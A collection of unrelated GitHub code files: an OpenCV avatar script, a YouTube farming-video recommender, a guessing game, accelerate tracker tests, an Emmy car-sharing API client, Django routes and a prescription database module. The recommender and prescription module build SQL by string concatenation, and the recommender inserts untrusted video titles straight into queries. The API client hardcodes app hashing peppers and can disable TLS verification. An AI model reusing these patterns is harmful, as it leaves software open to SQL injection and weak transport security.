pts=np.array([boca_d]), color=(0, 255, 0))\n cv2.fillPoly(image, pts=np.array([boca_u]), color=(0, 255, 0))\n cv2.fillPoly(image, pts=np.array([iris_l]), color=(255, 255, 0))\n cv2.fillPoly(image, pts=np.array([iris_r]), color=(255, 255, 0))\n cv2.fillPoly(image, pts=np.array([nose1]), color=(0, 0, 255)) # BGR\n cv2.fillPoly(image, pts=np.array([nose2]), color=(0, 0, 255))\n\n # transparencia\n tmp = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n _, alpha = cv2.threshold(tmp, 0, 125, cv2.THRESH_BINARY)\n b, g, r = cv2.split(image)\n image_transparency = cv2.merge([b,g,r, alpha], 4)\n image_transparency_tk = ImageTk.PhotoImage(image=Image.fromarray(image_transparency))\n canvas.itemconfig(pose_container, image=image_transparency_tk)\n root.update()\n\n aumento = 1.4\n image = cv2.resize(image, (int(frame_shape[1] * aumento), int(frame_shape[0] * aumento)))\n\ncv2.destroyAllWindows()\ncap.release()\nprint(\"Encerrou\")\n","repo_name":"inteligenciamilgrau/avatar_mediapipe","sub_path":"avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":6727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30990167166","text":"import csv\nimport urllib.request\nimport string\nfrom googleapiclient.discovery import build\nimport sqlite3\nimport pickle\nimport pandas as pd\nimport sklearn\nfrom nltk.corpus import stopwords\nimport re\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.model_selection import train_test_split\n\n# Get API key\nAPI_KEY = 'Add your YouTube API key here'\n\n# Build YouTube variable\nyoutube = build('youtube', 'v3', developerKey=API_KEY)\n\n# Create connection to video database\nconn = sqlite3.connect('farming_video.db')\nprint('Database Opened Successfully')\n\n\n# Removes punctuation and special characters\ndef clean_text(df, text_field, new_text_field_name):\n df[new_text_field_name] = df[text_field].str.lower()\n df[new_text_field_name] = df[new_text_field_name].apply(\n lambda elem: re.sub(r\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)|^rt|http.+?\", \"\", elem))\n # remove numbers\n df[new_text_field_name] = df[new_text_field_name].apply(lambda elem: re.sub(r\"\\d+\", \"\", elem))\n\n return df\n\n\npd.set_option('display.max_colwidth', -1)\n# nltk.download('stopwords')\n\nstop = stopwords.words('english')\n# Reads in the data\nfile_name = 'video_dataset (2).csv'\ntrain_data = pd.read_csv(file_name)\n# Drops all columns text and target\ncols_to_drop = ['video_url_id']\ntrain_data = train_data.drop(cols_to_drop, axis=1)\n\ndata_clean = clean_text(train_data, 'video_title', 'video_title')\n# Removes stop words\ndata_clean['video_title'] = data_clean['video_title'].apply(\n lambda x: ' '.join([word for word in x.split() if word not in stop]))\n\nX_train, X_test, y_train, y_test = train_test_split(data_clean['video_title'], data_clean['label'], random_state=0)\n\nvectorizer = TfidfVectorizer(min_df=10)\nX_train = vectorizer.fit_transform(X_train)\nX_test = vectorizer.transform(X_test)\n\nfilename = 'trained_model.sav'\nloaded_model = pickle.load(open(filename, 'rb'))\n\n\n# returns a string that can be used in a youtube search\ndef prepare_search_term(search_keyword):\n search_term = search_keyword\n # Clean the text\n\n # Punctuations\n punct = set(string.punctuation)\n punct.add('✔')\n search_term = \"\".join([ch for ch in search_term if ch not in punct])\n # Remove unicode text\n search_term = search_term.encode(encoding=\"ascii\", errors=\"ignore\").decode()\n\n # Split the 
text\n search_term = search_term.split()\n\n # Join with '+'\n search_term = '+'.join(search_term)\n\n # return search term\n return search_term\n\n\n# returns a list of titles\ndef extract_video_titles(video_ids):\n # Get title for each YouTube video\n titles_list = []\n for i in range(0, len(video_ids)):\n request = youtube.videos().list(\n part=\"snippet\",\n id=video_ids[i]\n )\n data = request.execute()\n # break_flag = False\n for video in data['items']:\n # Check title: if it is not farming: ignore this title (continue)\n title = video['snippet']['title']\n vectorized_title = [title]\n vectorized_title = vectorizer.transform(vectorized_title)\n prediction = loaded_model.predict(vectorized_title)\n if prediction == 1:\n titles_list.append(title)\n # break_flag = True\n # break\n # print('not farming video')\n # continue\n # if break_flag:\n # continue\n\n # Return title\n return titles_list\n\n\n# return a list of video ids\ndef search_youtube(search_term):\n # Search Youtube videos\n import urllib.request\n import re\n\n # search_keyword\n search_keyword = search_term\n\n html = urllib.request.urlopen(\"https://www.youtube.com/results?search_query=\" + search_keyword)\n video_ids = re.findall(r'watch\\?v=(\\S{11})', html.read().decode())\n\n # search results\n return video_ids\n\n\nsearch_word = 'fast farming'\nsearch_keyword = prepare_search_term(search_word)\n\n# Insert search term into SEARCH table\ntry:\n conn.execute(\"INSERT INTO SEARCH(search_term) VALUES('\" + search_word + \"');\")\n print('The search term: ' + search_word + ' is added Successfully')\n conn.commit()\nexcept Exception as e:\n print(e)\n print(\"search term \" + search_word + \"has been added before\")\n\n# Perform a YouTube search with the search word\nvideo_ids = search_youtube(prepare_search_term(search_word))\n\n# Insert videos into VIDEO table\n# Records or rows in a list\n# records = []\n# for i in range(len(video_ids)):\n# request = youtube.videos().list(\n# part=\"snippet\",\n# id=video_ids[i]\n# )\n# data = request.execute()\n# for video in data['items']:\n# title = video['snippet']['title']\n# records.append((title, video_ids[i]))\n\ncursor = conn.cursor()\n\n# insert multiple records\nfor i in range(len(video_ids)):\n request = youtube.videos().list(\n part=\"snippet\",\n id=video_ids[i]\n )\n data = request.execute()\n\n for video in data['items']:\n # Check title: if it is not farming: ignore this title (continue)\n title = video['snippet']['title']\n vectorized_title = [title]\n vectorized_title = vectorizer.transform(vectorized_title)\n prediction = loaded_model.predict(vectorized_title)\n if prediction == 1:\n try:\n conn.execute(\"INSERT INTO VIDEO(video_title,video_url_id) VALUES('\" + title + \"', '\" + video_ids[i] + \"');\")\n conn.commit()\n except BaseException as e:\n print(e)\n print(\"video \" + video_ids[i] + \"has been added before\")\n continue\n\nconn.execute(\"INSERT INTO SEARCH_VIDEO(search_id, video_id) \"\n \"SELECT SEARCH.search_id, VIDEO.video_id \"\n \"FROM SEARCH, VIDEO \"\n \"WHERE (SEARCH.search_term = '\" + search_word + \"');\")\nconn.commit()\n\ntitles = extract_video_titles(video_ids)\nkeywords = []\nfor i in range(0, 2):\n if i > 0:\n titles = new_titles\n for title in titles:\n # Insert title into SEARCH table\n # keywords.append(prepare_search_term(title))\n try:\n conn.execute(\"INSERT INTO SEARCH(search_term) VALUES('\" + title + \"');\")\n print('The search term: ' + title + ' is added Successfully')\n conn.commit()\n except Exception as e:\n print(e)\n 
print(\"search term \" + title + \"has been added before\")\n continue\n\n # Perform a YouTube search with the title\n video_ids = search_youtube(prepare_search_term(title))\n try:\n new_titles = extract_video_titles(video_ids)\n except Exception as e:\n print(e)\n continue\n\n cursor = conn.cursor()\n\n # insert multiple records\n for i in range(len(video_ids)):\n request = youtube.videos().list(\n part=\"snippet\",\n id=video_ids[i]\n )\n data = request.execute()\n for video in data['items']:\n title = video['snippet']['title']\n vectorized_title = [title]\n vectorized_title = vectorizer.transform(vectorized_title)\n prediction = loaded_model.predict(vectorized_title)\n if prediction == 1:\n try:\n conn.execute(\n \"INSERT INTO VIDEO(video_title,video_url_id) VALUES('\" + title + \"', '\" + video_ids[i] + \"');\")\n conn.commit()\n except BaseException as e:\n print(e)\n print(\"video \" + video_ids[i] + \"has been added before\")\n continue\n\n conn.execute(\"INSERT INTO SEARCH_VIDEO(search_id, video_id) \"\n \"SELECT SEARCH.search_id, VIDEO.video_id \"\n \"FROM SEARCH, VIDEO \"\n \"WHERE (SEARCH.search_term = '\" + search_word + \"');\")\n conn.commit()\n\nconn.close()\n","repo_name":"NajlaSaud/FarmingVideosRecommendationEngine","sub_path":"build_reco_db_iterate_search.py","file_name":"build_reco_db_iterate_search.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71366067600","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python3 \nimport os\n\nfrom random import randrange\n \nnombrePropose = 0\n \nnombreMystere = randrange(1, 100)\n\n# print(nombreMystere)\n\nprint(\"------ JEU DU NOMBRE MYSTERE ------\")\n\n# Boucle du jeu \nwhile nombrePropose != nombreMystere:\n \n #on test le nombre saisi\n error = True\n while error:\n \n print(\"\\nQuel est le nombre ?\")\n \n nombrePropose = input()\n \n try: # On essaye de le convertir en entier\n nombrePropose = int(nombrePropose)\n if nombrePropose > 100 or nombrePropose < 1:\n print(\"Vous devez saisir un nombre compris entre 1 et 100\")\n else:\n error = False\n except ValueError:\n print(\"Vous n'avez pas saisi un nombre !\")\n\n #condition pour un nombre saisi trop petit\n if nombrePropose < nombreMystere:\n print(\"C'est trop petit ! \")\n if nombrePropose >= (nombreMystere - 5):\n print(\"Mais vous êtes très proche ! \\n\")\n elif nombrePropose >= (nombreMystere - 10):\n print(\"Mais vous êtes proche ! \\n\")\n\t\n\t#condition pour un nombre saisi trop grand\t\n elif nombrePropose > nombreMystere:\n print(\"C'est trop grand ! \")\n if nombrePropose <= (nombreMystere + 5):\n print(\"Mais vous êtes très proche ! \\n\")\n elif nombrePropose <= (nombreMystere + 10):\n print(\"Mais vous êtes proche ! \\n\")\n \n else:\n print(\"\\n ######################################################### \\n ### FELICITATION, vous avez trouvé le nombre mystere !!! 
\\n #########################################################\")\n\n \n\n\t\t\nos.system(\"pause\")\n ","repo_name":"NDECROIX/AlyraExo","sub_path":"Ex1.1/Ex1.1.1.py","file_name":"Ex1.1.1.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"42457440794","text":"import csv\nimport json\nimport logging\nimport os\nimport re\nimport tempfile\nimport unittest\nimport zipfile\nfrom pathlib import Path\nfrom typing import Optional\nfrom unittest import mock\n\n# We use TF to parse the logs\nfrom accelerate import Accelerator\nfrom accelerate.test_utils.testing import (\n MockingTestCase,\n TempDirTestCase,\n require_comet_ml,\n require_tensorboard,\n require_wandb,\n)\nfrom accelerate.tracking import CometMLTracker, GeneralTracker\nfrom accelerate.utils import is_comet_ml_available\n\n\nif is_comet_ml_available():\n from comet_ml import OfflineExperiment\n\nlogger = logging.getLogger(__name__)\n\n\n@require_tensorboard\nclass TensorBoardTrackingTest(unittest.TestCase):\n def test_init_trackers(self):\n project_name = \"test_project_with_config\"\n with tempfile.TemporaryDirectory() as dirpath:\n accelerator = Accelerator(log_with=\"tensorboard\", logging_dir=dirpath)\n config = {\"num_iterations\": 12, \"learning_rate\": 1e-2, \"some_boolean\": False, \"some_string\": \"some_value\"}\n accelerator.init_trackers(project_name, config)\n accelerator.end_training()\n for child in Path(f\"{dirpath}/{project_name}\").glob(\"*/**\"):\n log = list(filter(lambda x: x.is_file(), child.iterdir()))[0]\n self.assertNotEqual(str(log), \"\")\n\n def test_log(self):\n project_name = \"test_project_with_log\"\n with tempfile.TemporaryDirectory() as dirpath:\n accelerator = Accelerator(log_with=\"tensorboard\", logging_dir=dirpath)\n accelerator.init_trackers(project_name)\n values = {\"total_loss\": 0.1, \"iteration\": 1, \"my_text\": \"some_value\"}\n accelerator.log(values, step=0)\n accelerator.end_training()\n # Logged values are stored in the outermost-tfevents file and can be read in as a TFRecord\n # Names are randomly generated each time\n log = list(filter(lambda x: x.is_file(), Path(f\"{dirpath}/{project_name}\").iterdir()))[0]\n self.assertNotEqual(str(log), \"\")\n\n def test_logging_dir(self):\n with self.assertRaisesRegex(ValueError, \"Logging with `tensorboard` requires a `logging_dir`\"):\n _ = Accelerator(log_with=\"tensorboard\")\n with tempfile.TemporaryDirectory() as dirpath:\n _ = Accelerator(log_with=\"tensorboard\", logging_dir=dirpath)\n\n\n@require_wandb\n@mock.patch.dict(os.environ, {\"WANDB_MODE\": \"offline\"})\nclass WandBTrackingTest(TempDirTestCase, MockingTestCase):\n def setUp(self):\n super().setUp()\n # wandb let's us override where logs are stored to via the WANDB_DIR env var\n self.add_mocks(mock.patch.dict(os.environ, {\"WANDB_DIR\": self.tmpdir}))\n\n @staticmethod\n def get_value_from_log(key: str, log: str, key_occurrence: int = 0):\n \"\"\"\n Parses wandb log for `key` and returns the value.\n If parsing through multiple calls to .log, pass in a `key_occurrence`\n \"\"\"\n res = re.findall(rf\"(?<={key} )[^\\s]+\", log)[key_occurrence]\n if '\"' in res:\n return re.findall(r'\"([^\"]*)\"', res)[0]\n else:\n return res\n\n def test_init_trackers(self):\n project_name = \"test_project_with_config\"\n accelerator = Accelerator(log_with=\"wandb\")\n config = {\"num_iterations\": 12, \"learning_rate\": 1e-2, \"some_boolean\": False, \"some_string\": \"some_value\"}\n kwargs = 
{\"wandb\": {\"tags\": [\"my_tag\"]}}\n accelerator.init_trackers(project_name, config, kwargs)\n accelerator.end_training()\n # The latest offline log is stored at wandb/latest-run/*.wandb\n for child in Path(f\"{self.tmpdir}/wandb/latest-run\").glob(\"*\"):\n logger.info(child)\n if child.is_file() and child.suffix == \".wandb\":\n with open(child, \"rb\") as f:\n content = f.read()\n break\n\n # Check HPS through careful parsing and cleaning\n cleaned_log = re.sub(r\"[\\x00-\\x1f]+\", \" \", content.decode(\"utf8\", \"ignore\"))\n self.assertEqual(self.get_value_from_log(\"num_iterations\", cleaned_log), \"12\")\n self.assertEqual(self.get_value_from_log(\"learning_rate\", cleaned_log), \"0.01\")\n self.assertEqual(self.get_value_from_log(\"some_boolean\", cleaned_log), \"false\")\n self.assertEqual(self.get_value_from_log(\"some_string\", cleaned_log), \"some_value\")\n self.assertIn(\"my_tag\", cleaned_log)\n\n def test_log(self):\n project_name = \"test_project_with_log\"\n accelerator = Accelerator(log_with=\"wandb\")\n accelerator.init_trackers(project_name)\n values = {\"total_loss\": 0.1, \"iteration\": 1, \"my_text\": \"some_value\"}\n accelerator.log(values, step=0)\n accelerator.end_training()\n # The latest offline log is stored at wandb/latest-run/*.wandb\n for child in Path(f\"{self.tmpdir}/wandb/latest-run\").glob(\"*\"):\n if child.is_file() and child.suffix == \".wandb\":\n with open(child, \"rb\") as f:\n content = f.read()\n break\n # Check HPS through careful parsing and cleaning\n cleaned_log = re.sub(r\"[\\x00-\\x1f]+\", \" \", content.decode(\"utf8\", \"ignore\"))\n self.assertTrue(\"0.1\" in self.get_value_from_log(\"total_loss\", cleaned_log))\n self.assertTrue(\"1\" in self.get_value_from_log(\"iteration\", cleaned_log))\n self.assertTrue(\"some_value\" in self.get_value_from_log(\"my_text\", cleaned_log))\n self.assertTrue(\"0\" in self.get_value_from_log(\"_step\", cleaned_log))\n\n\n# Comet has a special `OfflineExperiment` we need to use for testing\ndef offline_init(self, run_name: str, tmpdir: str):\n self.run_name = run_name\n self.writer = OfflineExperiment(project_name=run_name, offline_directory=tmpdir)\n logger.info(f\"Initialized offline CometML project {self.run_name}\")\n logger.info(\"Make sure to log any initial configurations with `self.store_init_configuration` before training!\")\n\n\n@require_comet_ml\n@mock.patch.object(CometMLTracker, \"__init__\", offline_init)\nclass CometMLTest(unittest.TestCase):\n @staticmethod\n def get_value_from_key(log_list, key: str, is_param: bool = False):\n \"Extracts `key` from Comet `log`\"\n for log in log_list:\n j = json.loads(log)[\"payload\"]\n if is_param and \"param\" in j.keys():\n if j[\"param\"][\"paramName\"] == key:\n return j[\"param\"][\"paramValue\"]\n if \"log_other\" in j.keys():\n if j[\"log_other\"][\"key\"] == key:\n return j[\"log_other\"][\"val\"]\n if \"metric\" in j.keys():\n if j[\"metric\"][\"metricName\"] == key:\n return j[\"metric\"][\"metricValue\"]\n\n def test_init_trackers(self):\n with tempfile.TemporaryDirectory() as d:\n tracker = CometMLTracker(\"test_project_with_config\", d)\n accelerator = Accelerator(log_with=tracker)\n config = {\"num_iterations\": 12, \"learning_rate\": 1e-2, \"some_boolean\": False, \"some_string\": \"some_value\"}\n accelerator.init_trackers(None, config)\n accelerator.end_training()\n log = os.listdir(d)[0] # Comet is nice, it's just a zip file here\n # We parse the raw logs\n p = os.path.join(d, log)\n archive = zipfile.ZipFile(p, \"r\")\n log = 
archive.open(\"messages.json\").read().decode(\"utf-8\")\n list_of_json = log.split(\"\\n\")[:-1]\n self.assertEqual(self.get_value_from_key(list_of_json, \"num_iterations\", True), 12)\n self.assertEqual(self.get_value_from_key(list_of_json, \"learning_rate\", True), 0.01)\n self.assertEqual(self.get_value_from_key(list_of_json, \"some_boolean\", True), False)\n self.assertEqual(self.get_value_from_key(list_of_json, \"some_string\", True), \"some_value\")\n\n def test_log(self):\n with tempfile.TemporaryDirectory() as d:\n tracker = CometMLTracker(\"test_project_with_config\", d)\n accelerator = Accelerator(log_with=tracker)\n accelerator.init_trackers(None)\n values = {\"total_loss\": 0.1, \"iteration\": 1, \"my_text\": \"some_value\"}\n accelerator.log(values, step=0)\n accelerator.end_training()\n log = os.listdir(d)[0] # Comet is nice, it's just a zip file here\n # We parse the raw logs\n p = os.path.join(d, log)\n archive = zipfile.ZipFile(p, \"r\")\n log = archive.open(\"messages.json\").read().decode(\"utf-8\")\n list_of_json = log.split(\"\\n\")[:-1]\n self.assertEqual(self.get_value_from_key(list_of_json, \"curr_step\", True), 0)\n self.assertEqual(self.get_value_from_key(list_of_json, \"total_loss\"), 0.1)\n self.assertEqual(self.get_value_from_key(list_of_json, \"iteration\"), 1)\n self.assertEqual(self.get_value_from_key(list_of_json, \"my_text\"), \"some_value\")\n\n\nclass MyCustomTracker(GeneralTracker):\n \"Basic tracker that writes to a csv for testing\"\n _col_names = [\n \"total_loss\",\n \"iteration\",\n \"my_text\",\n \"learning_rate\",\n \"num_iterations\",\n \"some_boolean\",\n \"some_string\",\n ]\n\n name = \"my_custom_tracker\"\n requires_logging_directory = False\n\n def __init__(self, dir: str):\n self.f = open(f\"{dir}/log.csv\", \"w+\")\n self.writer = csv.DictWriter(self.f, fieldnames=self._col_names)\n self.writer.writeheader()\n\n @property\n def tracker(self):\n return self.writer\n\n def store_init_configuration(self, values: dict):\n logger.info(\"Call init\")\n self.writer.writerow(values)\n\n def log(self, values: dict, step: Optional[int]):\n logger.info(\"Call log\")\n self.writer.writerow(values)\n\n def finish(self):\n self.f.close()\n\n\nclass CustomTrackerTestCase(unittest.TestCase):\n def test_init_trackers(self):\n with tempfile.TemporaryDirectory() as d:\n tracker = MyCustomTracker(d)\n accelerator = Accelerator(log_with=tracker)\n config = {\"num_iterations\": 12, \"learning_rate\": 1e-2, \"some_boolean\": False, \"some_string\": \"some_value\"}\n accelerator.init_trackers(\"Some name\", config)\n accelerator.end_training()\n with open(f\"{d}/log.csv\", \"r\") as f:\n data = csv.DictReader(f)\n data = next(data)\n truth = {\n \"total_loss\": \"\",\n \"iteration\": \"\",\n \"my_text\": \"\",\n \"learning_rate\": \"0.01\",\n \"num_iterations\": \"12\",\n \"some_boolean\": \"False\",\n \"some_string\": \"some_value\",\n }\n self.assertDictEqual(data, truth)\n\n def test_log(self):\n with tempfile.TemporaryDirectory() as d:\n tracker = MyCustomTracker(d)\n accelerator = Accelerator(log_with=tracker)\n accelerator.init_trackers(\"Some name\")\n values = {\"total_loss\": 0.1, \"iteration\": 1, \"my_text\": \"some_value\"}\n accelerator.log(values, step=0)\n accelerator.end_training()\n with open(f\"{d}/log.csv\", \"r\") as f:\n data = csv.DictReader(f)\n data = next(data)\n truth = {\n \"total_loss\": \"0.1\",\n \"iteration\": \"1\",\n \"my_text\": \"some_value\",\n \"learning_rate\": \"\",\n \"num_iterations\": \"\",\n \"some_boolean\": \"\",\n 
\"some_string\": \"\",\n }\n self.assertDictEqual(data, truth)\n","repo_name":"tcarta/DLP","sub_path":"v0.13.2/accelerate-0.13.2/tests/test_tracking.py","file_name":"test_tracking.py","file_ext":"py","file_size_in_byte":11653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27053602423","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport requests\nfrom typing import List\n\nfrom EmmyAPI.model.reservation import Reservation\nfrom EmmyAPI.model.territory import Territory\nfrom EmmyAPI.util.hash import create_auth_string\nfrom EmmyAPI.auth import EmmyAuth\nfrom EmmyAPI.exeptions import handle_error_response, NotLoggedInException\nfrom EmmyAPI.model.user import User\nfrom EmmyAPI.model.car import Car, CarListItem\n\n\nclass EmmyAPI:\n\tAPI_URL = 'https://emio-frontend.com/api/prod/v2.07'\n\tURL_ENCODING_SHA1_PEPPER = [\n\t\t'r8UY7jvUVukMsVNENfGZDUaWnzBQccGx',\n\t\t'mHeWYBzWQ6dHshrmUJF7HKRMoRpwoMWj',\n\t\t'JZWsFxFv9frtVgLYUwPahTVG4WGyYLZW',\n\t\t'aVFGGdUx3Rt2rUYVyEDBFrvdKkFgaiMZ',\n\t]\n\tUSER_AGENT = 'CarSharing/1.99.7 (iPhone; iOS 12.1.4; Scale/2.00)'\n\n\tdef __init__(self, username, password, proxies=None, verify=True):\n\t\tself.username = username\n\t\tself.password = password\n\t\tself.user_id = None\n\t\tself.auth = None\n\t\tself.session = requests.Session()\n\t\tself.verify = verify\n\t\tproxies = proxies if proxies is not None else {}\n\t\tself.session.proxies.update(proxies)\n\t\tself.init_headers()\n\n\tdef init_headers(self):\n\t\tself.session.headers.update({\n\t\t\t'User-Agent': self.USER_AGENT,\n\t\t\t'Content-type': 'application/json',\n\t\t\t'Accept-Encoding': 'gzip, deflate',\n\t\t\t'Accept': 'application/json; charset=utf-8'\n\t\t})\n\n\t##########################\n\t# Endpoints\n\t##########################\n\n\tdef login(self, force=False) -> None:\n\t\t\"\"\"\n\t\tcalls /login endpoint\n\t\treceives an authentication token and saves it in session\n\n\t\t:param force: force user re-login if already logged in\n\t\t:rtype: None\n\t\t\"\"\"\n\n\t\tif not self._is_logged_in or force:\n\t\t\tpayload = {\"grant_type\": \"client_credentials\"}\n\t\t\theaders = {\n\t\t\t\t'Authorization': create_auth_string(self.username, self.password, self.URL_ENCODING_SHA1_PEPPER)\n\t\t\t}\n\n\t\t\tresponse = self._request('login', method='post', headers=headers, json=payload, login=True)\n\t\t\tresponse_json = response.json()\n\n\t\t\tself.auth = EmmyAuth(response_json.get('accessToken'))\n\t\t\tself.user_id = response_json.get('userId')\n\n\t# Users\n\t#####################################\n\n\tdef get_user_info(self) -> User:\n\t\t\"\"\"\n\t\t:return: User information object\n\t\t\"\"\"\n\t\tendpoint = 'users/{}'.format(self.user_id)\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn User(response.json())\n\n\t# Cars\n\t#####################################\n\n\tdef list_cars(self, lat, lon) -> List[CarListItem]:\n\t\tendpoint = 'cars'\n\t\tparams = {\n\t\t\t'lat': lat,\n\t\t\t'lon': lon,\n\t\t}\n\t\tresponse = self._request(endpoint, method='get', params=params)\n\t\treturn [CarListItem(item) for item in response.json()]\n\n\tdef get_car_info(self, car_id) -> Car:\n\t\tendpoint = 'cars/{}'.format(car_id)\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn Car(response.json())\n\n\tdef unlock_car(self, car_id: int or str):\n\t\tendpoint = 'users/{}/reservations/{}/car/unlock'.format(self.user_id, car_id)\n\t\tresponse = self._request(endpoint, method='post')\n\t\treturn 
Car(response.json())\n\n\tdef lock_car(self, car_id: int or str):\n\t\tendpoint = 'users/{}/reservations/{}/car/lock'.format(self.user_id, car_id)\n\t\tresponse = self._request(endpoint, method='post')\n\t\treturn Car(response.json())\n\n\t# Map\n\t#####################################\n\n\tdef get_cars_in_area(self,\n\t lat1: str or float,\n\t lat2: str or float,\n\t lon1: str or float,\n\t lon2: str or float) -> List[CarListItem]:\n\t\tendpoint = 'map/cars'\n\t\tparams = {\n\t\t\t'lat1': lat1,\n\t\t\t'lat2': lat2,\n\t\t\t'lon1': lon1,\n\t\t\t'lon2': lon2,\n\t\t}\n\t\tresponse = self._request(endpoint, method='get', params=params)\n\t\treturn [CarListItem(item) for item in response.json()]\n\n\tdef get_all_cars(self) -> List[CarListItem]:\n\t\tendpoint = 'map/cars'\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn [CarListItem(item) for item in response.json()]\n\n\tdef get_territories(self) -> List[Territory]:\n\t\tendpoint = 'territories/business'\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn [Territory(item) for item in response.json()]\n\n\t# todo: find out what this does\n\tdef locations(self):\n\t\tendpoint = 'locations'\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn response.json()\n\n\t# Reservations\n\t#####################################\n\n\tdef start_reservation(self, car_id: int or str) -> Reservation:\n\t\tendpoint = 'users/{}/reservations/new'.format(self.user_id)\n\t\tdata = {\n\t\t\t'carId': car_id,\n\t\t}\n\t\tresponse = self._request(endpoint, method='post', json=data)\n\t\treturn Reservation(response.json())\n\n\tdef end_reservation(self, reservation_id: int or str) -> Reservation:\n\t\tendpoint = 'users/{}/reservations/{}/end'.format(self.user_id, reservation_id)\n\t\tresponse = self._request(endpoint, method='put', )\n\t\treturn Reservation(response.json())\n\n\tdef get_reservation_info(self, reservation_id: int or str) -> Reservation:\n\t\tendpoint = 'users/{}/reservations/{}'.format(self.user_id, reservation_id)\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn Reservation(response.json())\n\n\t# General\n\t#####################################\n\n\tdef log(self, lat: str or float, lon: str or float, event_name: str) -> bool:\n\t\tendpoint = 'log'\n\t\tdata = {\n\t\t\t'data': {\n\t\t\t\t'lat': lat,\n\t\t\t\t'lon': lon,\n\t\t\t\t'userId': self.user_id,\n\t\t\t},\n\t\t\t'eventName': event_name,\n\t\t}\n\t\tresponse = self._request(endpoint, method='post', json=data)\n\t\treturn response.json().get('success')\n\n\tdef notifications(self) -> List:\n\t\tendpoint = 'notifications'\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn response.json()\n\n\t##########################\n\t# Private Methods\n\t##########################\n\n\tdef _request(\n\t\t\tself,\n\t\t\tendpoint: str,\n\t\t\tmethod: str,\n\t\t\theaders: dict = None,\n\t\t\tjson: dict = None,\n\t\t\tparams: dict = None,\n\t\t\tlogin: bool = False):\n\n\t\tif not self._is_logged_in and not login:\n\t\t\traise NotLoggedInException()\n\n\t\tadditional_headers = headers if headers is not None else {}\n\t\tlocal_params = params if params is not None else {}\n\n\t\tself.session.headers.update(additional_headers)\n\t\tr = requests.Request(\n\t\t\tmethod,\n\t\t\turl=self._api_url(endpoint),\n\t\t\tparams=local_params,\n\t\t\tjson=json,\n\t\t\tauth=self.auth)\n\t\tprepped = self.session.prepare_request(r)\n\n\t\tresponse = self.session.send(prepped, verify=self.verify)\n\t\tif response.status_code >= 
400:\n\t\t\thandle_error_response(response)\n\n\t\treturn response\n\n\t@property\n\tdef _is_logged_in(self) -> bool:\n\t\treturn self.auth is not None\n\n\tdef _api_url(self, endpoint=''):\n\t\tif not endpoint.startswith('/'):\n\t\t\tendpoint = '/' + endpoint\n\t\tif not endpoint.endswith('/'):\n\t\t\tendpoint += '/'\n\t\treturn self.API_URL + endpoint\n","repo_name":"antonbaumann/emmy-api-python","sub_path":"EmmyAPI/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6546,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"40110351235","text":"from django.urls import path\nfrom roadmaps import views\n\napp_name = \"roadmaps\"\n\nurlpatterns = [\n path(\"\", views.RoadMapListView.as_view(), name=\"list\"),\n path(\"create/\", views.RoadMapCreateView.as_view(), name=\"create\"),\n path(\"/\", views.RoadMapDetailView.as_view(), name=\"detail\"),\n path(\"/update/\", views.RoadMapUpdateView.as_view(), name=\"update\"),\n]","repo_name":"isys35/DJANGO_2610_LESSONS","sub_path":"classroom/roadmaps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32507125339","text":"from DatabaseConnection import connection\n\n#Class in charge of accessing the database with the information related to the prescriptions\nclass PrescriptionDAO:\n def create_prescription(treatment):\n conn = connection.Connection.make_connection()\n\n cur = conn.cursor()\n\n # Obtener el id del historial\n cur.execute(\"SELECT id FROM MedicalHistory WHERE patient_id=\" + str(treatment.patient_id))\n history_id = cur.fetchone()\n\n # Hacer el medical file\n cur.execute(\"INSERT INTO MedicalFile (date, type, history_id) VALUES (?, ?, ?)\", (treatment.date_created, \\\n treatment._type, history_id[0]))\n conn.commit()\n\n cur.execute(\"SELECT MAX(id) FROM MedicalFile\")\n file_id = cur.fetchone()\n\n # Hacer el treatment\n cur.execute(\"INSERT INTO Treatment (doctor_id, file_id) VALUES(?,?)\", \\\n (treatment.doctor_id, file_id[0]))\n conn.commit()\n\n cur.execute(\"SELECT MAX(id) FROM Treatment\")\n treatment_id = cur.fetchone()\n\n for x in range(0, len(treatment.description)):\n cur.execute(\"SELECT id FROM TreatmentItem WHERE name='\" + treatment.description[x] + \"'\")\n item_id = cur.fetchone()\n\n cur.execute(\"INSERT INTO TreatmentList(item_id, treatment_id, frequency, dose, administration) VALUES (?, ?, ?, ?, ?)\", (item_id[0], \\\n treatment_id[0], treatment.frequency_value[x] + \" \" + treatment.frequency[x], treatment.dose[x], treatment.administration[x]))\n conn.commit()\n\n conn.close()","repo_name":"richardmoonw/ENT_PlusHealth","sub_path":"src/Prescriptions/prescription_dao.py","file_name":"prescription_dao.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43813378333","text":"# 4485. 
